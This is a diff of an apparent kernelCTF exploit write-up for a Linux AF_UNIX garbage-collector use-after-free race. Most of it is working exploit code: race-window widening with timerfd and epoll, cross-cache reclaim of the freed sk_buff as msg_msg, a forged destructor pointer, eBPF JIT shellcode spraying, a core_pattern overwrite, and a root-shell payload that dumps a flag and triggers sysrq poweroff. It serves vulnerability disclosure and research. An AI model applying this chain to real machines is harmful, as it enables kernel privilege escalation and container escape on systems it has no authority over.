|
| 1 | +# Vulnerability |
| 2 | +unix_gc() tries to garbage-collect inflight sockets, and then if the socket has MSG_OOB in unix_sk(sk)->oob_skb, GC will drop the reference locklessly. |
| 3 | +It will cause race condition in unix_gc[1] while peer unix socket call queue_oob[2]. |
| 4 | + |
| 5 | +* unix_gc |
| 6 | +```c |
| 7 | + skb_queue_head_init(&hitlist); |
| 8 | + list_for_each_entry(u, &gc_candidates, link) { |
| 9 | + scan_children(&u->sk, inc_inflight, &hitlist); |
| 10 | + |
| 11 | +#if IS_ENABLED(CONFIG_AF_UNIX_OOB) |
| 12 | + if (u->oob_skb) { |
| 13 | + kfree_skb(u->oob_skb); //[1] |
| 14 | + u->oob_skb = NULL; |
| 15 | + } |
| 16 | +#endif |
| 17 | + } |
| 18 | + |
| 19 | +``` |
| 20 | +
|
| 21 | +* queue_oob |
| 22 | +```c |
| 23 | + if (ousk->oob_skb) |
| 24 | + consume_skb(ousk->oob_skb); //[2] |
| 25 | +
|
| 26 | + WRITE_ONCE(ousk->oob_skb, skb); |
| 27 | +``` |
| 28 | + |
| 29 | + |
| 30 | + |
| 31 | +# Exploit Tech Detail |
| 32 | +The exploit is consist in the following steps |
| 33 | +* Prepare timerfd to extend race window |
| 34 | +* Prepare refcount circle to make unix_gc free victim unix_socket |
| 35 | +* Race between unix_gc with queue_oob |
| 36 | +* Reclaim SKB with msg_msg to control destructor |
| 37 | +* Call kfree_skb to RIP Control |
| 38 | +* Achieve container escape. |
| 39 | + |
| 40 | +## Prepare timerfd to extend race window |
| 41 | +We adopt the exploit tech from `Jann's blog Racing against the clock -- hitting a tiny kernel race window` to extend the race windows |
| 42 | +To make race windows larger on kernels without CONFIG_PREEMPT. |
| 43 | +* make a timerfd expire in that window (which will run in an interrupt handler - in other words, in hardirq context) |
| 44 | +* make sure that the wakeup triggered by the timerfd has to churn through many waitqueue items created by epoll |
| 45 | + |
| 46 | +So function `do_epoll_enqueue` in our exploit code is to do such thing |
| 47 | +```C |
| 48 | +void do_epoll_enqueue(int fd) |
| 49 | +{ |
| 50 | + int cfd[2]; |
| 51 | + socketpair(AF_UNIX, SOCK_STREAM, 0, cfd); |
| 52 | + for (int k = 0; k < 0x4; k++) |
| 53 | + { |
| 54 | + if (fork() == 0) |
| 55 | + { |
| 56 | + for (int i = 0; i < 0x100; i++) |
| 57 | + { |
| 58 | + timefds[i] = SYSCHK(dup(fd)); |
| 59 | + } |
| 60 | + for (int i = 0; i < 0xc0; i++) |
| 61 | + { |
| 62 | + epfds[i] = SYSCHK(epoll_create(0x1)); |
| 63 | + } |
| 64 | + for (int i = 0; i < 0xc0; i++) |
| 65 | + { |
| 66 | + for (int j = 0; j < 0x100; j++) |
| 67 | + { |
| 68 | + // queue as many as possible async waiters at timerfd waitqueue |
| 69 | + epoll_ctl_add(epfds[i], timefds[j], 0); |
| 70 | + } |
| 71 | + } |
| 72 | + write(cfd[1], buf, 1); |
| 73 | + raise(SIGSTOP); // stop here for nothing and just keep epoll alive |
| 74 | + } |
| 75 | + // sync to make sure it has queue what we need |
| 76 | + read(cfd[0], buf, 1); |
| 77 | + } |
| 78 | + close(cfd[0]); |
| 79 | + close(cfd[1]); |
| 80 | +} |
| 81 | +``` |
| 82 | +
|
| 83 | +## Race between unix_gc with queue_oob |
| 84 | +
|
| 85 | +sk_buff's refcount is named as users. When sk_buff will be freed if users==1 while calling kfree_skb. |
| 86 | +Unix socket oob_skb's users has two. One is for stored in unix_sock->oob_skb and another is for sock->sk_receive_queue. |
| 87 | +We use two threads to cause race between unix_gc and queue_oob in the following condition. |
| 88 | +
|
| 89 | +Thread A | Thread B |
| 90 | +----------------------------|------------------------------ |
| 91 | +queue_oob() // users == 2 <br> consume_skb() // users == 2 -> 1 | unix_gc() |
| 92 | +<br> | if (u->oob_skb) // users == 1 <br> kfree_skb(u->oob_skb) // free skb |
| 93 | +WRITE_ONCE(ousk->oob_skb, skb) | |
| 94 | +<br> | unix_release_sock() <br> skb = skb_dequeue(&sk->sk_receive_queue) <br> kfree_skb(skb); // skb UAF |
| 95 | +
|
| 96 | +## Reclaim SKB with msg_msg to control destructor |
| 97 | +
|
| 98 | +sk_buff is under `skbuff_head_cache` with size `0xe0` |
| 99 | +``` |
| 100 | +gef➤ p sizeof(struct sk_buff) |
| 101 | +$1 = 0xe0 |
| 102 | +``` |
| 103 | +With cross-cache tech, we can reclaim victim skb as msg_msg which is under `kmalloc-cg-256` cache like following example code. |
| 104 | +
|
| 105 | +* Allocate a lot skbs between victim |
| 106 | +```c |
| 107 | + // Allocate some sk_buff before oob_skb |
| 108 | + for (int i = 0; i < 0x200; i++) |
| 109 | + SYSCHK(send(datafd[1], buf, 1, 0)); |
| 110 | +
|
| 111 | + SYSCHK(send(victim_fd[1], buf, 1, MSG_OOB)); |
| 112 | +
|
| 113 | + // Allocate some sk_buff after oob_skb |
| 114 | + for (int i = 0; i < 0x200; i++) |
| 115 | + SYSCHK(send(datafd[0], buf, 1, 0)); |
| 116 | +
|
| 117 | +``` |
| 118 | + |
| 119 | +* Free them all and reclaim as msg_msg |
| 120 | +```c |
| 121 | + // free all skbs |
| 122 | + for (int i = 0; i < 0x200; i++) |
| 123 | + SYSCHK(recv(datafd[0], buf, 1, 0)); |
| 124 | + |
| 125 | + // free all skbs |
| 126 | + for (int i = 0; i < 0x200; i++) |
| 127 | + SYSCHK(recv(datafd[1], buf, 1, 0)); |
| 128 | + |
| 129 | + // cross-cache to reclaim oob_skb as msg_msg |
| 130 | + for (int i = 0; i < 0x1000; i++) |
| 131 | + SYSCHK(msgsnd(msqid[i], &msg, 0x100 - 0x30, 0)); |
| 132 | +``` |
| 133 | +
|
| 134 | +* Forge skb to make users equal to one and destructor as the address we want to jump to |
| 135 | +
|
| 136 | +```c |
| 137 | + char *skb = (void *)&msg.mtext[-0x30]; |
| 138 | +
|
| 139 | + // struct sk_buff { |
| 140 | + // void (*destructor)(struct sk_buff *); /* 96 8 */ |
| 141 | + // refcount_t users; /* 220 4 */ |
| 142 | +#define OFFSET_SKB_DESTRUCTOR 96 |
| 143 | +#define OFFSET_SKB_USERS 220 |
| 144 | + *(size_t *)(skb + OFFSET_SKB_DESTRUCTOR) = 0xffffffffcc000000 - 0x800; |
| 145 | + *(unsigned *)(skb + OFFSET_SKB_USERS) = 1; |
| 146 | +``` |
| 147 | + |
| 148 | +## RIP Control |
| 149 | +We set `skb->destructor` to guessed ebpf JIT address. |
| 150 | + |
| 151 | +```c |
| 152 | +void skb_release_head_state(struct sk_buff *skb) |
| 153 | +{ |
| 154 | + skb_dst_drop(skb); |
| 155 | + if (skb->destructor) { |
| 156 | + DEBUG_NET_WARN_ON_ONCE(in_hardirq()); |
| 157 | + skb->destructor(skb); |
| 158 | + } |
| 159 | +``` |
| 160 | +
|
| 161 | +
|
| 162 | +## Achieve container escape |
| 163 | +### Spray eBPF programs |
| 164 | +Our goal is to do some eBPF JIT spraying so later when we control kernel RIP, it will jump to the JIT page and execute our shellcode. |
| 165 | +
|
| 166 | +Linux kernel provide a socket option `SO_ATTACH_FILTER` and let user to attach a classic BPF program to the socket for use as a filter of incoming packets. |
| 167 | +
|
| 168 | +By creating lots of sockets and attach to classic BPF program, we can spray a lot of eBPF programs in kernel. |
| 169 | +```cpp |
| 170 | + struct sock_fprog prog = { |
| 171 | + .len = TSIZE, |
| 172 | + .filter = filter, |
| 173 | + }; |
| 174 | + for(int i=0;i<NUM;i++){ |
| 175 | + int fd[2]; |
| 176 | + SYSCHK(socketpair(AF_UNIX,SOCK_DGRAM,0,fd)); |
| 177 | + SYSCHK(setsockopt(fd[0],SOL_SOCKET,26,&prog,sizeof(prog))); |
| 178 | + } |
| 179 | +``` |
| 180 | + |
| 181 | +As for the shellcode in our eBPF program, our goal is to overwrite `/proc/sys/kernel/core_pattern` so later we can execute command as root by triggering crash. Here's what our shellcode did to achieve our goal: |
| 182 | +* Use the `rdmsr` instruction to obtain the kernel text address. With RCX being set to MSR_LSTAR ( `0xc0000082` ), we'll be able to obtain the address of `entry_SYSCALL_64`. |
| 183 | +* Calculate the address of `core_pattern` and `_copy_from_user`. |
| 184 | +* Call `_copy_from_user(core_pattern, user_buf, 0x30);`, where `user_buf` is a buffer in user space that stores the content we want to overwrite in `core_pattern`. |
| 185 | + |
| 186 | +We construct our eBPF program with the following form: |
| 187 | + |
| 188 | +```cpp |
| 189 | +struct sock_filter table[] = { |
| 190 | + {.code = BPF_LD + BPF_K, .k = 0xb3909090}, |
| 191 | + {.code = BPF_LD + BPF_K, .k = 0xb3909090}, |
| 192 | + ..................... |
| 193 | +}; |
| 194 | +``` |
| 195 | +
|
| 196 | +The above example will be compiled into the following instructions after JIT: |
| 197 | +
|
| 198 | +``` |
| 199 | +b8 90 90 90 b3 mov eax, 0xb3909090 |
| 200 | +b8 90 90 90 b3 mov eax, 0xb3909090 |
| 201 | +``` |
| 202 | +
|
| 203 | +If we can control kernel RIP to jump into the NOP instruction ( 0x90 ), the code will become: |
| 204 | +
|
| 205 | +``` |
| 206 | +90 nop |
| 207 | +b3 b8 mov bl, 0xb8 |
| 208 | +90 nop |
| 209 | +90 nop |
| 210 | +90 nop |
| 211 | +b3 b8 mov bl, 0xb8 |
| 212 | +.... |
| 213 | +``` |
| 214 | +
|
| 215 | +We can see that by using an extra byte `0xb3`, we can skip the useless byte `0xb8` and execute our own shellcode. Notice that due to the "skipping part", we only have 3 bytes of space in each instruction, so we'll have to take care of that as well during our shellcode construction. |
| 216 | +
|
| 217 | +### Post RIP |
| 218 | +
|
| 219 | +Once we control the kernel RIP and jump into the middle of our eBPF program, the shellcode we crafted will cause core_pattern being overwritten to `|/proc/%P/fd/666 %P`: |
| 220 | +
|
| 221 | +We then use memfd and write an executable file payload in fd 666. |
| 222 | +```C |
| 223 | +int check_core() |
| 224 | +{ |
| 225 | + // Check if /proc/sys/kernel/core_pattern has been overwritten |
| 226 | + char buf[0x100] = {}; |
| 227 | + int core = open("/proc/sys/kernel/core_pattern", O_RDONLY); |
| 228 | + read(core, buf, sizeof(buf)); |
| 229 | + close(core); |
| 230 | + return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0; |
| 231 | +} |
| 232 | +void crash(char *cmd) |
| 233 | +{ |
| 234 | + int memfd = memfd_create("", 0); |
| 235 | + SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff)); |
| 236 | + dup2(memfd, 666); |
| 237 | + close(memfd); |
| 238 | + while (check_core() == 0) |
| 239 | + sleep(1); |
| 240 | + puts("Root shell !!"); |
| 241 | + /* Trigger program crash and cause kernel to executes program from core_pattern which is our "root" binary */ |
| 242 | + *(size_t *)0 = 0; |
| 243 | +} |
| 244 | +``` |
| 245 | + |
| 246 | +Later when coredump happened, it will execute our executable file as root in root namespace: |
| 247 | +```C |
| 248 | +*(size_t*)0=0; //trigger coredump |
| 249 | +``` |
| 250 | + |
| 251 | +Spawn shell when coredump happened. This is the code looks like: |
| 252 | +```c++ |
| 253 | +int main(int argc, char **argv) |
| 254 | +{ |
| 255 | + if (argc > 1) |
| 256 | + { |
| 257 | + // #define SYS_pidfd_getfd 438 |
| 258 | + int pid = strtoull(argv[1], 0, 10); |
| 259 | + int pfd = syscall(SYS_pidfd_open, pid, 0); |
| 260 | + int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0); |
| 261 | + int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0); |
| 262 | + int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0); |
| 263 | + dup2(stdinfd, 0); |
| 264 | + dup2(stdoutfd, 1); |
| 265 | + dup2(stderrfd, 2); |
| 266 | + /* Get flag and poweroff immediately to boost next round try in PR verification workflow*/ |
| 267 | + system("cat /flag;echo o>/proc/sysrq-trigger"); |
| 268 | + execlp("bash", "bash", NULL); |
| 269 | + } |
| 270 | +``` |
0 commit comments